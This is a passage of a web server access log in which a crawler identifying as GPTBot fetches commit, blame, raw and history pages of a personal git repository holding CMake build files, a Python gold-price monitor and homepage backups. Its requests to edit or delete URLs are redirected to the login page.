"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:16:17:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14402] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/index.html" +[17/Feb/2026:16:17:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 9788] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6259] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:17:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9970] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21622] [Gzip 28.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:17:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 9968] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:17:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 13638] [Gzip 7.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15355] [Gzip 8.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:17:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 9954] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 12544] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:17:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" [Client 74.7.227.38] [Length 21667] [Gzip 28.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_C.bin" +[17/Feb/2026:16:17:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 17576] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" [Client 74.7.227.38] [Length 2790] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeCCompiler.cmake" +[17/Feb/2026:16:17:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html?display=source" [Client 74.7.227.38] [Length 14401] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/index.html" +[17/Feb/2026:16:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?files=html" [Client 74.7.227.38] [Length 19789] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:17:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:17:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11031] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 11053] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?files=html" [Client 74.7.227.38] [Length 15595] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" +[17/Feb/2026:16:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13293] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11182] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:17:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:45 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor-VeryGood2.py" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/GoldMonitor-VeryGood2.py" +[17/Feb/2026:16:17:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11179] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" [Client 74.7.227.38] [Length 10252] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:17:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21741] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21742] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21714] [Gzip 28.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 21740] [Gzip 28.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 9979] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 9948] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" +[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" [Client 74.7.227.38] [Length 33367] [Gzip 10.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/a.out" [Client 74.7.227.38] [Length 11044] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC" +[17/Feb/2026:16:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" +[17/Feb/2026:16:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/a.out" [Client 74.7.227.38] [Length 12664] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 